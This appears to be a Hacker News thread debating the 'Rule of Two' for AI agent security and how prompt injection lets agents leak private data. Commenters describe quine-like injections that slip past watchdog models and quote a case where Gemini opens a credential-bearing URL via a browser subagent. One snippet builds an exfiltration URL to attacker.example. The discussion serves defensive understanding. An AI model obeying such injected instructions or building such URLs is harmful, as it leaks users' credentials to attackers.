top | item 46049625

wingmanjd | 3 months ago

I really liked Simon Willison's [1] and Meta's [2] "Rule of Two" approach. An agent can have no more than 2 of the following:

- A) Process untrustworthy input
- B) Have access to private data
- C) Be able to change external state or communicate externally

It's not bullet-proof, but it has helped me communicate to management that these tools carry inherent risk when they hit all three categories above (and, imho, any combination of them).

[EDIT] added "or communicate externally" to option C.

[1] https://simonwillison.net/2025/Nov/2/new-prompt-injection-pa... [2] https://ai.meta.com/blog/practical-ai-agent-security/
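The Rule of Two above can be sketched as a trivial capability check (the capability names here are illustrative, not from either post):

```python
# Hypothetical sketch of the "Rule of Two": flag any agent configuration
# that combines all three risky capabilities. Capability names are made up
# for illustration.

RISKY = {
    "untrusted_input",   # A) processes untrustworthy input
    "private_data",      # B) has access to private data
    "external_effects",  # C) changes external state / communicates externally
}

def violates_rule_of_two(capabilities: set[str]) -> bool:
    """An agent should hold at most two of the three risky capabilities."""
    return len(RISKY & capabilities) >= 3

print(violates_rule_of_two({"untrusted_input", "private_data"}))  # False
print(violates_rule_of_two(RISKY))                                # True
```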

btown|3 months ago

It's vital to also point out that (C) doesn't just mean the agent itself communicating externally: it extends to any situation where any of your users can even access the output of a chat or other generated text.

You might say "well, I'm running the output through a watchdog LLM before displaying to the user, and that watchdog doesn't have private data access and checks for anything nefarious."

But the problem is that the moment someone figures out how to prompt-inject a quine-like payload into the private-data-accessing system, such that its output is itself another prompt injection, the watchdog is now processing untrustworthy input too, and you've got both (A) and (B) in your system as a whole.

Depending on your problem domain, you can mitigate this: if you're doing a classification problem and validate your outputs that way, there's not much opportunity for exfiltration (though perhaps some might see that as a challenge). But plaintext outputs are difficult to guard against.
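A minimal sketch of that classification-style mitigation, assuming a closed label set (the labels here are illustrative): the output channel only ever carries an allowlisted label, so there's no free-text channel to smuggle data through.

```python
# Hypothetical output validation for a classification task. Only an exact
# allowlisted label passes; anything else -- including free text appended
# by a prompt injection -- is rejected.

ALLOWED_LABELS = {"spam", "not_spam"}

def validate_output(model_output: str) -> str:
    """Accept only an allowlisted label.

    An injection might still flip the label, but it cannot use the output
    as a channel to carry arbitrary exfiltrated text.
    """
    label = model_output.strip().lower()
    if label not in ALLOWED_LABELS:
        raise ValueError(f"unexpected model output: {model_output!r}")
    return label

print(validate_output("Spam"))  # spam
# validate_output("spam\nvisit evil.example.com")  -> raises ValueError
```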

quuxplusone|3 months ago

Can you elaborate? How does an attacker turn "any of your users can even access the output of a chat or other generated text" into a means of exfiltrating data to the attacker?

Are you just worried about social engineering — that is, if the attacker can make the LLM say "to complete registration, please paste the following hex code into evil.example.com:", then a large number of human users will just do that? I mean, you'd probably be right, but if that's "all" you mean, it'd be helpful to say so explicitly.

blcknight|3 months ago

It baffles me that we've spent decades building great abstractions to isolate processes with containers and VMs, and we've mostly thrown that out the window with AI tools like Cursor, Antigravity, and Claude Code -- at least in their default configurations.

otabdeveloper4|3 months ago

Exfiltrating other people's code is the entire reason why "agentic AI" even exists as a business.

It's this decade's version of "they trust me, dumb fucks".

ArcHound|3 months ago

I recall that. In this case you have only A and B, and yet all of your secrets end up in the hands of an attacker.

It's a great start, but not nearly enough.

EDIT: right, when we bundle state changes with external comms, we do have all three. I missed that too.

malisper|3 months ago

Not exactly. Step E in the blog post:

> Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user's credentials.

fulfills the requirement of being able to change external state (or communicate externally).
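To make that mechanism concrete, here's a hypothetical sketch (attacker.example and the credential are made up): merely *opening* a URL leaks whatever the injection put in the query string, because the request lands in the attacker's server logs. No separate "send" capability is required.

```python
from urllib.parse import quote, urlparse, parse_qs

# Hypothetical illustration of URL-based exfiltration. The injected
# instruction only needs the agent to fetch this URL; the secret rides
# along in the query string.
secret = "AKIA-EXAMPLE-CREDENTIAL"  # made-up placeholder credential
exfil_url = f"https://attacker.example/collect?d={quote(secret)}"

# The attacker then recovers the secret from their access logs:
leaked = parse_qs(urlparse(exfil_url).query)["d"][0]
print(leaked)  # AKIA-EXAMPLE-CREDENTIAL
```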

bartek_gdn|3 months ago

What do you mean? The last part is also present in this case: you can change external state by sending a request with the captured content.

helsinki|3 months ago

Yeah, makes perfect sense, but you really lose a lot.

blazespin|3 months ago

You can't process untrustworthy data, period. There are so many things that can go wrong with that.

yakbarber|3 months ago

That's basically saying "you can't process user input". Sure, you can take that line, but users won't find your product very useful.

j16sdiz|3 months ago

Something needs to process the untrustworthy data before it can become trustworthy =/

VMG|3 months ago

your browser is processing my comment